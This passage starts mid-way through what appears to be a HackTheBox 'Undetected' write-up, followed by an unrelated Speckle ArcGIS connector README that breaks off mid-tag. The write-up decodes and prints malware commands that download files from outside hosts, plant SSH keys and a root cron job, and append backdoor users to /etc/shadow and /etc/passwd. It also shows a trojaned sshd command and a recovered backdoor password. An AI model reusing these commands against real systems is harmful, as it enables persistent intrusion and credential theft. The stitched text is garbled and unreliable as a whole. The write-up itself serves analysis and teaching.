fprintf sendto sleep __cxa_finalize memmem __libc_start_main write libc.so.6 GLIBC_2.3.4 GLIBC_2.4 GLIBC_2.2.5 _ITM_deregisterTMCloneTable __gmon_start__ _ITM_registerTMCloneTable u/UH []A\A]A^A_ [-] setsockopt(PACKET_VERSION) [-] setsockopt(PACKET_RX_RING) [-] socket(AF_PACKET) [-] bind(AF_PACKET) [-] sendto(SOCK_RAW) [-] socket(SOCK_RAW) [-] socket(SOCK_DGRAM) [-] klogctl(SYSLOG_ACTION_SIZE_BUFFER) [-] klogctl(SYSLOG_ACTION_READ_ALL) Freeing SMP [-] substring '%s' not found in dmesg ffff /bin/bash 776765742074656d7066696c65732e78797a2f617574686f72697a65645f6b657973202d4f202f726f6f742f2e7373682f617574686f72697a65645f6b6579733b20776765742074656d7066696c65732e78797a2f2e6d61696e202d4f202f7661722f6c69622f2e6d61696e3b2063686d6f6420373535202f7661722f6c69622f2e6d61696e3b206563686f20222a2033202a202a202a20726f6f74202f7661722f6c69622f2e6d61696e22203e3e202f6574632f63726f6e7461623b2061776b202d46223a2220272437203d3d20222f62696e2f6261736822202626202433203e3d2031303030207b73797374656d28226563686f2022243122313a5c24365c247a5337796b4866464d673361596874345c2431495572685a616e5275445a6866316f49646e6f4f76586f6f6c4b6d6c77626b656742586b2e567447673738654c3757424d364f724e7447625a784b427450753855666d39684d30522f424c6441436f513054396e2f3a31383831333a303a39393939393a373a3a3a203e3e202f6574632f736861646f7722297d27202f6574632f7061737377643b2061776b202d46223a2220272437203d3d20222f62696e2f6261736822202626202433203e3d2031303030207b73797374656d28226563686f2022243122202224332220222436222022243722203e2075736572732e74787422297d27202f6574632f7061737377643b207768696c652072656164202d7220757365722067726f757020686f6d65207368656c6c205f3b20646f206563686f202224757365722231223a783a2467726f75703a2467726f75703a2c2c2c3a24686f6d653a247368656c6c22203e3e202f6574632f7061737377643b20646f6e65203c2075736572732e7478743b20726d2075736572732e7478743b [-] fork() /etc/shadow [.] checking if we got root [-] something went wrong =( [+] got r00t ^_^ [-] unshare(CLONE_NEWUSER) deny /proc/self/setgroups ... ``` We can see the hex string, By decoding the [hex to ascii](https://gchq.github.io/CyberChef/#recipe=From_Hex('Auto')&input=Nzc2NzY1NzQyMDc0NjU2ZDcwNjY2OTZjNjU3MzJlNzg3OTdhMmY2MTc1NzQ2ODZmNzI2OTdhNjU2NDVmNmI2NTc5NzMyMDJkNGYyMDJmNzI2ZjZmNzQyZjJlNzM3MzY4MmY2MTc1NzQ2ODZmNzI2OTdhNjU2NDVmNmI2NTc5NzMzYjIwNzc2NzY1NzQyMDc0NjU2ZDcwNjY2OTZjNjU3MzJlNzg3OTdhMmYyZTZkNjE2OTZlMjAyZDRmMjAyZjc2NjE3MjJmNmM2OTYyMmYyZTZkNjE2OTZlM2IyMDYzNjg2ZDZmNjQyMDM3MzUzNTIwMmY3NjYxNzIyZjZjNjk2MjJmMmU2ZDYxNjk2ZTNiMjA2NTYzNjg2ZjIwMjIyYTIwMzMyMDJhMjAyYTIwMmEyMDcyNmY2Zjc0MjAyZjc2NjE3MjJmNmM2OTYyMmYyZTZkNjE2OTZlMjIyMDNlM2UyMDJmNjU3NDYzMmY2MzcyNmY2ZTc0NjE2MjNiMjA2MTc3NmIyMDJkNDYyMjNhMjIyMDI3MjQzNzIwM2QzZDIwMjIyZjYyNjk2ZTJmNjI2MTczNjgyMjIwMjYyNjIwMjQzMzIwM2UzZDIwMzEzMDMwMzAyMDdiNzM3OTczNzQ2NTZkMjgyMjY1NjM2ODZmMjAyMjI0MzEyMjMxM2E1YzI0MzY1YzI0N2E1MzM3Nzk2YjQ4NjY0NjRkNjczMzYxNTk2ODc0MzQ1YzI0MzE0OTU1NzI2ODVhNjE2ZTUyNzU0NDVhNjg2NjMxNmY0OTY0NmU2ZjRmNzY1ODZmNmY2YzRiNmQ2Yzc3NjI2YjY1Njc0MjU4NmIyZTU2NzQ0NzY3MzczODY1NGMzNzU3NDI0ZDM2NGY3MjRlNzQ0NzYyNWE3ODRiNDI3NDUwNzUzODU1NjY2ZDM5Njg0ZDMwNTIyZjQyNGM2NDQxNDM2ZjUxMzA1NDM5NmUyZjNhMzEzODM4MzEzMzNhMzAzYTM5MzkzOTM5MzkzYTM3M2EzYTNhMjAzZTNlMjAyZjY1NzQ2MzJmNzM2ODYxNjQ2Zjc3MjIyOTdkMjcyMDJmNjU3NDYzMmY3MDYxNzM3Mzc3NjQzYjIwNjE3NzZiMjAyZDQ2MjIzYTIyMjAyNzI0MzcyMDNkM2QyMDIyMmY2MjY5NmUyZjYyNjE3MzY4MjIyMDI2MjYyMDI0MzMyMDNlM2QyMDMxMzAzMDMwMjA3YjczNzk3Mzc0NjU2ZDI4MjI2NTYzNjg2ZjIwMjIyNDMxMjIyMDIyMjQzMzIyMjAyMjI0MzYyMjIwMjIyNDM3MjIyMDNlMjA3NTczNjU3MjczMmU3NDc4NzQyMjI5N2QyNzIwMmY2NTc0NjMyZjcwNjE3MzczNzc2NDNiMjA3NzY4Njk2YzY1MjA3MjY1NjE2NDIwMmQ3MjIwNzU3MzY1NzIyMDY3NzI2Zjc1NzAyMDY4NmY2ZDY1MjA3MzY4NjU2YzZjMjA1ZjNiMjA2NDZmMjA2NTYzNjg2ZjIwMjIyNDc1NzM2NTcyMjIzMTIyM2E3ODNhMjQ2NzcyNmY3NTcwM2EyNDY3NzI2Zjc1NzAzYTJjMmMyYzNhMjQ2ODZmNmQ2NTNhMjQ3MzY4NjU2YzZjMjIyMDNlM2UyMDJmNjU3NDYzMmY3MDYxNzM3Mzc3NjQzYjIwNjQ2ZjZlNjUyMDNjMjA3NTczNjU3MjczMmU3NDc4NzQzYjIwNzI2ZDIwNzU3MzY1NzI3MzJlNzQ3ODc0M2I) we get: ```console wget tempfiles.xyz/authorized_keys -O /root/.ssh/authorized_keys; wget tempfiles.xyz/.main -O /var/lib/.main; chmod 755 /var/lib/.main; echo "* 3 * * * root /var/lib/.main" >> /etc/crontab; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1"1:\$6\$zS7ykHfFMg3aYht4\$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ0T9n/:18813:0:99999:7::: >> /etc/shadow")}' /etc/passwd; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1" "$3" "$6" "$7" > users.txt")}' /etc/passwd; while read -r user group home shell _; do echo "$user"1":x:$group:$group:,,,:$home:$shell" >> /etc/passwd; done < users.txt; rm users.txt; ``` We can see this is trying to add a new user with ```\$6\$zS7ykHfFMg3aYht4\$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ0T9n/``` as hashed password. According to the strings on the files, we can guess it is the following exploit [https://www.exploit-db.com/exploits/47169](https://www.exploit-db.com/exploits/47169) which runs by ```www-data``` user. Let's try to decrypt the hash (remove the ```\``` before ```$```): ```console ┌─[evyatar@parrot]─[/hackthebox/Undetected] └──╼ $ cat hash $6$zS7ykHfFMg3aYht4\$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ0T9n/ ┌─[evyatar@parrot]─[/hackthebox/Undetected] └──╼ $ john --wordlist=~/Desktop/rockyou.txt hash Using default input encoding: UTF-8 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status ihatehackers (?) 1g 0:00:00:16 DONE (2022-05-06 17:07) 0.06134g/s 5465p/s 5465c/s 5465C/s littlebird..hairy Use the "--show" option to display all of the cracked passwords reliably Session completed ``` And we get password ```ihatehackers```. Let's look on ```/etc/passwd```: ```console $ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin pollinate:x:110:1::/var/cache/pollinate:/bin/false usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin steven:x:1000:1000:Steven Wright:/home/steven:/bin/bash lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false sshd:x:112:65534::/run/sshd:/usr/sbin/nologin steven1:x:1000:1000:,,,:/home/steven:/bin/bash ``` As we can see, we have users ```steven``` and ```steven1``` it looks odd. Let's try to log in using the password ```ihatehackers``` to ```steven1``` user: ```console ┌─[evyatar@parrot]─[/hackthebox/Undetected] └──╼ $ ssh [email protected] [email protected]'s password: steven@production:~$ whoami && hostname steven production steven@production:~$ cat user.txt 31475dcf7fcf4c6b3a6d42252971152d ``` And we get the user flag ```31475dcf7fcf4c6b3a6d42252971152d```. ### Root By reading the mails of ```steven``` user we get the following email: ```console steven@production:~$ cat /var/mail/steven From root@production Sun, 25 Jul 2021 10:31:12 GMT Return-Path: <root@production> Received: from production (localhost [127.0.0.1]) by production (8.15.2/8.15.2/Debian-18) with ESMTP id 80FAcdZ171847 for <steven@production>; Sun, 25 Jul 2021 10:31:12 GMT Received: (from root@localhost) by production (8.15.2/8.15.2/Submit) id 80FAcdZ171847; Sun, 25 Jul 2021 10:31:12 GMT Date: Sun, 25 Jul 2021 10:31:12 GMT Message-Id: <202107251031.80FAcdZ171847@production> To: steven@production From: root@production Subject: Investigations Hi Steven. We recently updated the system but are still experiencing some strange behaviour with the Apache service. We have temporarily moved the web store and database to another server whilst investigations are underway. If for any reason you need access to the database or web application code, get in touch with Mark and he will generate a temporary password for you to authenticate to the temporary server. Thanks, sysadmin ``` We can see the hint about the ```Apache``` service. According to the mail, they updated the ```Apache```, Let's observe the modules: ```console steven@production:/usr/lib/apache2/modules$ ls -ltr total 8772 -rw-r--r-- 1 root root 34800 May 17 2021 mod_reader.so -rw-r--r-- 1 root root 4625776 Nov 25 23:16 libphp7.4.so -rw-r--r-- 1 root root 26832 Jan 5 14:49 mod_xml2enc.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_vhost_alias.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_usertrack.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_userdir.so -rw-r--r-- 1 root root 14464 Jan 5 14:49 mod_unique_id.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_suexec.so -rw-r--r-- 1 root root 26832 Jan 5 14:49 mod_substitute.so -rw-r--r-- 1 root root 26832 Jan 5 14:49 mod_status.so -rw-r--r-- 1 root root 248240 Jan 5 14:49 mod_ssl.so -rw-r--r-- 1 root root 18640 Jan 5 14:49 mod_speling.so -rw-r--r-- 1 root root 26832 Jan 5 14:49 mod_socache_shmcb.so -rw-r--r-- 1 root root 18640 Jan 5 14:49 mod_socache_redis.so -rw-r--r-- 1 root root 18640 Jan 5 14:49 mod_socache_memcache.so -rw-r--r-- 1 root root 18640 Jan 5 14:49 mod_socache_dbm.so -rw-r--r-- 1 root root 18640 Jan 5 14:49 mod_slotmem_shm.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_slotmem_plain.so -rw-r--r-- 1 root root 18640 Jan 5 14:49 mod_setenvif.so -rw-r--r-- 1 root root 22736 Jan 5 14:49 mod_session_dbd.so -rw-r--r-- 1 root root 30928 Jan 5 14:49 mod_session_crypto.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_session_cookie.so -rw-r--r-- 1 root root 26832 Jan 5 14:49 mod_session.so -rw-r--r-- 1 root root 43216 Jan 5 14:49 mod_sed.so -rw-r--r-- 1 root root 75984 Jan 5 14:49 mod_rewrite.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_request.so -rw-r--r-- 1 root root 18640 Jan 5 14:49 mod_reqtimeout.so -rw-r--r-- 1 root root 30928 Jan 5 14:49 mod_remoteip.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_reflector.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_ratelimit.so -rw-r--r-- 1 root root 18560 Jan 5 14:49 mod_proxy_wstunnel.so -rw-r--r-- 1 root root 22656 Jan 5 14:49 mod_proxy_uwsgi.so -rw-r--r-- 1 root root 22768 Jan 5 14:49 mod_proxy_scgi.so -rw-r--r-- 1 root root 67936 Jan 5 14:49 mod_proxy_http2.so -rw-r--r-- 1 root root 47312 Jan 5 14:49 mod_proxy_http.so -rw-r--r-- 1 root root 39152 Jan 5 14:49 mod_proxy_html.so -rw-r--r-- 1 root root 35024 Jan 5 14:49 mod_proxy_hcheck.so -rw-r--r-- 1 root root 47312 Jan 5 14:49 mod_proxy_ftp.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_proxy_fdpass.so -rw-r--r-- 1 root root 35024 Jan 5 14:49 mod_proxy_fcgi.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_proxy_express.so -rw-r--r-- 1 root root 18640 Jan 5 14:49 mod_proxy_connect.so -rw-r--r-- 1 root root 59600 Jan 5 14:49 mod_proxy_balancer.so -rw-r--r-- 1 root root 55504 Jan 5 14:49 mod_proxy_ajp.so -rw-r--r-- 1 root root 133888 Jan 5 14:49 mod_proxy.so -rw-r--r-- 1 root root 39120 Jan 5 14:49 mod_negotiation.so -rw-r--r-- 1 root root 47312 Jan 5 14:49 mod_mpm_worker.so -rw-r--r-- 1 root root 39120 Jan 5 14:49 mod_mpm_prefork.so -rw-r--r-- 1 root root 67792 Jan 5 14:49 mod_mpm_event.so -rw-r--r-- 1 root root 30928 Jan 5 14:49 mod_mime_magic.so -rw-r--r-- 1 root root 26832 Jan 5 14:49 mod_mime.so -rw-r--r-- 1 root root 260672 Jan 5 14:49 mod_md.so -rw-r--r-- 1 root root 18640 Jan 5 14:49 mod_macro.so -rw-r--r-- 1 root root 134544 Jan 5 14:49 mod_lua.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_log_forensic.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_log_debug.so -rw-r--r-- 1 root root 84176 Jan 5 14:49 mod_ldap.so -rw-r--r-- 1 root root 22736 Jan 5 14:49 mod_lbmethod_heartbeat.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_lbmethod_bytraffic.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_lbmethod_byrequests.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_lbmethod_bybusyness.so -rw-r--r-- 1 root root 26832 Jan 5 14:49 mod_info.so -rw-r--r-- 1 root root 55504 Jan 5 14:49 mod_include.so -rw-r--r-- 1 root root 18640 Jan 5 14:49 mod_imagemap.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_ident.so -rw-r--r-- 1 root root 253632 Jan 5 14:49 mod_http2.so -rw-r--r-- 1 root root 30928 Jan 5 14:49 mod_heartmonitor.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_heartbeat.so -rw-r--r-- 1 root root 30928 Jan 5 14:49 mod_headers.so -rw-r--r-- 1 root root 22736 Jan 5 14:49 mod_filter.so -rw-r--r-- 1 root root 14592 Jan 5 14:49 mod_file_cache.so -rw-r--r-- 1 root root 26832 Jan 5 14:49 mod_ext_filter.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_expires.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_env.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_echo.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_dumpio.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_dir.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_dialup.so -rw-r--r-- 1 root root 39120 Jan 5 14:49 mod_deflate.so -rw-r--r-- 1 root root 26832 Jan 5 14:49 mod_dbd.so -rw-r--r-- 1 root root 18640 Jan 5 14:49 mod_dav_lock.so -rw-r--r-- 1 root root 59600 Jan 5 14:49 mod_dav_fs.so -rw-r--r-- 1 root root 104656 Jan 5 14:49 mod_dav.so -rw-r--r-- 1 root root 14464 Jan 5 14:49 mod_data.so -rw-r--r-- 1 root root 26832 Jan 5 14:49 mod_charset_lite.so -rw-r--r-- 1 root root 43216 Jan 5 14:49 mod_cgid.so -rw-r--r-- 1 root root 30928 Jan 5 14:49 mod_cgi.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_cern_meta.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_case_filter_in.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_case_filter.so -rw-r--r-- 1 root root 39152 Jan 5 14:49 mod_cache_socache.so -rw-r--r-- 1 root root 39120 Jan 5 14:49 mod_cache_disk.so -rw-r--r-- 1 root root 80176 Jan 5 14:49 mod_cache.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_buffer.so -rw-r--r-- 1 root root 14464 Jan 5 14:49 mod_bucketeer.so -rw-r--r-- 1 root root 22736 Jan 5 14:49 mod_brotli.so -rw-r--r-- 1 root root 43216 Jan 5 14:49 mod_autoindex.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_authz_user.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_authz_owner.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_authz_host.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_authz_groupfile.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_authz_dbm.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_authz_dbd.so -rw-r--r-- 1 root root 30928 Jan 5 14:49 mod_authz_core.so -rw-r--r-- 1 root root 55528 Jan 5 14:49 mod_authnz_ldap.so -rw-r--r-- 1 root root 35024 Jan 5 14:49 mod_authnz_fcgi.so -rw-r--r-- 1 root root 22768 Jan 5 14:49 mod_authn_socache.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_authn_file.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_authn_dbm.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_authn_dbd.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_authn_core.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_authn_anon.so -rw-r--r-- 1 root root 35024 Jan 5 14:49 mod_auth_form.so -rw-r--r-- 1 root root 39120 Jan 5 14:49 mod_auth_digest.so -rw-r--r-- 1 root root 18640 Jan 5 14:49 mod_auth_basic.so -rw-r--r-- 1 root root 14464 Jan 5 14:49 mod_asis.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_allowmethods.so -rw-r--r-- 1 root root 18640 Jan 5 14:49 mod_alias.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_actions.so -rw-r--r-- 1 root root 14544 Jan 5 14:49 mod_access_compat.so -rw-r--r-- 1 root root 15925 Jan 5 14:49 httpd.exp steven@production:/usr/lib/apache2/modules$ ``` We can see the following module with different date: ```console -rw-r--r-- 1 root root 34800 May 17 2021 mod_reader.so ``` By observing the ```strings``` of this file we can see the following: ```console ┌─[evyatar@parrot]─[/hackthebox/Undetected] └──╼ $ strings mod_reader.so __gmon_start__ _ITM_deregisterTMCloneTable _ITM_registerTMCloneTable __cxa_finalize ap_hook_handler ap_hook_post_config decodeblock strncat __stack_chk_fail b64_decode strchr fork execve reader_module libc.so.6 mod_reader.so GLIBC_2.2.5 GLIBC_2.4 u/UH AUATUSH <=tlH []A\A] D$(1 D$(dH+ reader /bin/bash mod_reader.c d2dldCBzaGFyZWZpbGVzLnh5ei9pbWFnZS5qcGVnIC1PIC91c3Ivc2Jpbi9zc2hkOyB0b3VjaCAtZCBgZGF0ZSArJVktJW0tJWQgLXIgL3Vzci9zYmluL2EyZW5tb2RgIC91c3Ivc2Jpbi9zc2hk ;*3$" ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ 42PA GCC: (Debian 10.2.1-6) 10.2.1 20210110 w#% ... ``` As we can see we have an base64 string ```d2dldCBzaGFyZWZpbGVzLnh5ei9pbWFnZS5qcGVnIC1PIC91c3Ivc2Jpbi9zc2hkOyB0b3VjaCAtZCBgZGF0ZSArJVktJW0tJWQgLXIgL3Vzci9zYmluL2EyZW5tb2RgIC91c3Ivc2Jpbi9zc2hk``` which looks odd. By decoding this base64 we get: ```console wget sharefiles.xyz/image.jpeg -O /usr/sbin/sshd; touch -d `date +%Y-%m-%d -r /usr/sbin/a2enmod` /usr/sbin/sshd ``` Meaning that wget saved file called ```/usr/sbin/sshd``` and modified the date according ```/usr/sbin/a2enmod``` file. The ```sshd``` process is started when the system boots. The program is usually located at ```/usr/sbin/sshd```. It runs as root. The initial process acts as the master server that listens to incoming connections. Generally, this process is the one with the lowest process id or the one that has been running the longest. It is also the parent process of all the other ```sshd``` processes. The following command can be used to display the process tree on Linux, and it is easy to see which one is the parent process ([Reference](https://www.ssh.com/academy/ssh/sshd)). Usually, to inject code into ```sshd``` process we inject it into ```auth_password``` ([Example](https://jm33.me/sshd-injection-and-password-harvesting.html)). Let's decompile the modified ```sshd``` using [Ghidra](https://github.com/NationalSecurityAgency/ghidra) and look on ```auth_password``` function: ```c /* WARNING: Could not reconcile some variable overlaps */ int auth_password(ssh *ssh,char *password) { Authctxt *ctxt; passwd *ppVar1; int iVar2; uint uVar3; byte *pbVar4; byte *pbVar5; size_t sVar6; byte bVar7; int iVar8; long in_FS_OFFSET; char backdoor [31]; byte local_39 [9]; long local_30; bVar7 = 0xd6; ctxt = (Authctxt *)ssh->authctxt; local_30 = *(long *)(in_FS_OFFSET + 0x28); backdoor._28_2_ = 0xa9f4; ppVar1 = ctxt->pw; iVar8 = ctxt->valid; backdoor._24_4_ = 0xbcf0b5e3; backdoor._16_8_ = 0xb2d6f4a0fda0b3d6; backdoor[30] = -0x5b; backdoor._0_4_ = 0xf0e7abd6; backdoor._4_4_ = 0xa4b3a3f3; backdoor._8_4_ = 0xf7bbfdc8; backdoor._12_4_ = 0xfdb3d6e7; pbVar4 = (byte *)backdoor; while( true ) { pbVar5 = pbVar4 + 1; *pbVar4 = bVar7 ^ 0x96; if (pbVar5 == local_39) break; bVar7 = *pbVar5; pbVar4 = pbVar5; } iVar2 = strcmp(password,backdoor); uVar3 = 1; if (iVar2 != 0) { sVar6 = strlen(password); uVar3 = 0; if (sVar6 < 0x401) { if ((ppVar1->pw_uid == 0) && (options.permit_root_login != 3)) { iVar8 = 0; } if ((*password != '\0') || (uVar3 = options.permit_empty_passwd, options.permit_empty_passwd != 0)) { if (auth_password::expire_checked == 0) { auth_password::expire_checked = 1; iVar2 = auth_shadow_pwexpired(ctxt); if (iVar2 != 0) { ctxt->force_pwchange = 1; } } iVar2 = sys_auth_passwd(ssh,password); if (ctxt->force_pwchange != 0) { auth_restrict_session(ssh); } uVar3 = (uint)(iVar2 != 0 && iVar8 != 0); } } } if (local_30 == *(long *)(in_FS_OFFSET + 0x28)) { return (int)uVar3; } /* WARNING: Subroutine does not return */ __stack_chk_fail(); } ``` We can see the ```backdoor``` array which XOR later with ```0x96```. Let's arrenge the ```backdoor```: ```c backdoor[30] = -0x5b; backdoor._28_2_ = 0xa9f4; backdoor._24_4_ = 0xbcf0b5e3; backdoor._16_8_ = 0xb2d6f4a0fda0b3d6; backdoor._12_4_ = 0xfdb3d6e7; backdoor._8_4_ = 0xf7bbfdc8; backdoor._4_4_ = 0xa4b3a3f3; backdoor._0_4_ = 0xf0e7abd6; ``` We can see on Ghidra that ```backdoor[30]``` is ```0xa5```: ![backdoor30.JPG](images/backdoor30.JPG) So let's replace it: ```c backdoor[30] = 0xa5; backdoor._28_2_ = 0xa9f4; backdoor._24_4_ = 0xbcf0b5e3; backdoor._16_8_ = 0xb2d6f4a0fda0b3d6; backdoor._12_4_ = 0xfdb3d6e7; backdoor._8_4_ = 0xf7bbfdc8; backdoor._4_4_ = 0xa4b3a3f3; backdoor._0_4_ = 0xf0e7abd6; ``` Next, Let's take it to [CyberChef](https://gchq.github.io/CyberChef/#recipe=Swap_endianness('Hex',31,false)&input=MHhhNQoweGE5ZjQKMHhiY2YwYjVlMwoweGIyZDZmNGEwZmRhMGIzZDYKMHhmZGIzZDZlNwoweGY3YmJmZGM4CjB4YTRiM2EzZjMKMHhmMGU3YWJkNg) to swap endianness: ![swap.JPG](images/swap.JPG) The word length ```31``` it's because the ```backdoor``` array size is ```31```. Next, Let's convert it [from hex using CyberChef](https://gchq.github.io/CyberChef/#recipe=Swap_endianness('Hex',31,false)From_Hex('Space')&input=MHhhNQoweGE5ZjQKMHhiY2YwYjVlMwoweGIyZDZmNGEwZmRhMGIzZDYKMHhmZGIzZDZlNwoweGY3YmJmZGM4CjB4YTRiM2EzZjMKMHhmMGU3YWJkNg): ![fromhex.JPG](images/fromhex.JPG) And finally let's [XOR it with 0x96](https://gchq.github.io/CyberChef/#recipe=Swap_endianness('Hex',31,false)From_Hex('Space')XOR(%7B'option':'Hex','string':'96'%7D,'Standard',false)&input=MHhhNQoweGE5ZjQKMHhiY2YwYjVlMwoweGIyZDZmNGEwZmRhMGIzZDYKMHhmZGIzZDZlNwoweGY3YmJmZGM4CjB4YTRiM2EzZjMKMHhmMGU3YWJkNg): ![xor96.JPG](images/xor96.JPG) We get the password ```@=qfe5%2^k-aq@%k@%6k6b@$u#f*b?3```. Let's use it: ```console ┌─[evyatar@parrot]─[/hackthebox/Undetected] └──╼ $ ssh [email protected] [email protected]'s password: Last login: Tue Feb 8 20:11:45 2022 from 10.10.14.23 root@production:~# hostname && whoami production root root@production:~# cat root.txt 7218c5cb1988b52a8dbe5addd26669a6 ``` And we get the root flag ```7218c5cb1988b52a8dbe5addd26669a6```.
Writeups for this box is not available but there is a video walkthrough of this challenge in my Youtube Channel. [Link to this Youtube Video](https://www.youtube.com/watch?v=7qvePuDB7z8).
<h1 align="center"> <img src="https://user-images.githubusercontent.com/2679513/131189167-18ea5fe1-c578-47f6-9785-3748178e4312.png" width="150px"/><br/> Speckle | ArcGIS </h1> <h3 align="center"> Connector for Spatial Data from ArcGIS </h3> <p align="center"><b>Speckle</b> is the data infrastructure for the AEC industry.</p><br/> <p align="center"><a href="https://twitter.com/SpeckleSystems"><img src="https://img.shields.io/twitter/follow/SpeckleSystems?style=social" alt="Twitter Follow"></a> <a href="https://speckle.community"><img src="https://img.shields.io/discourse/users?server=https%3A%2F%2Fspeckle.community&amp;style=flat-square&amp;logo=discourse&amp;logoColor=white" alt="Community forum users"></a> <a href="https://speckle.systems"><img src="https://img.shields.io/badge/https://-speckle.systems-royalblue?style=flat-square" alt="website"></a> <a href="https://speckle.guide/dev/"><img src="https://img.shields.io/badge/docs-speckle.guide-orange?style=flat-square&amp;logo=read-the-docs&amp;logoColor=white" alt="docs"></a></p> <p align="center"> # About Speckle What is Speckle? Check our ![YouTube Video Views](https://img.shields.io/youtube/views/B9humiSpHzM?label=Speckle%20in%201%20minute%20video&style=social) ### Features - **Object-based:** say goodbye to files! Speckle is the first object based platform for the AEC industry - **Version control:** Speckle is the Git & Hub for geometry and BIM data - **Collaboration:** share your designs collaborate with others - **3D Viewer:** see your CAD and BIM models online, share and embed them anywhere - **Interoperability:** get your CAD and BIM models into other software without exporting or importing - **Real time:** get real time updates and notifications and changes - **GraphQL API:** get what you need anywhere you want it - **Webhooks:** the base for a automation and next-gen pipelines - **Built for developers:** we are building Speckle with developers in mind and got tools for every stack - **Built for the AEC industry:** Speckle connectors are plugins for the most common software used in the industry such as Revit, Rhino, Grasshopper, AutoCAD, Civil 3D, Excel, Unreal Engine, Unity, QGIS, ArcGIS (you are here), Blender and more! ### Try Speckle now! Give Speckle a try in no time by: - [![speckle XYZ](https://img.shields.io/badge/https://-speckle.xyz-0069ff?style=flat-square&logo=hackthebox&logoColor=white)](https://speckle.xyz) ⇒ creating an account at our public server - [![create a 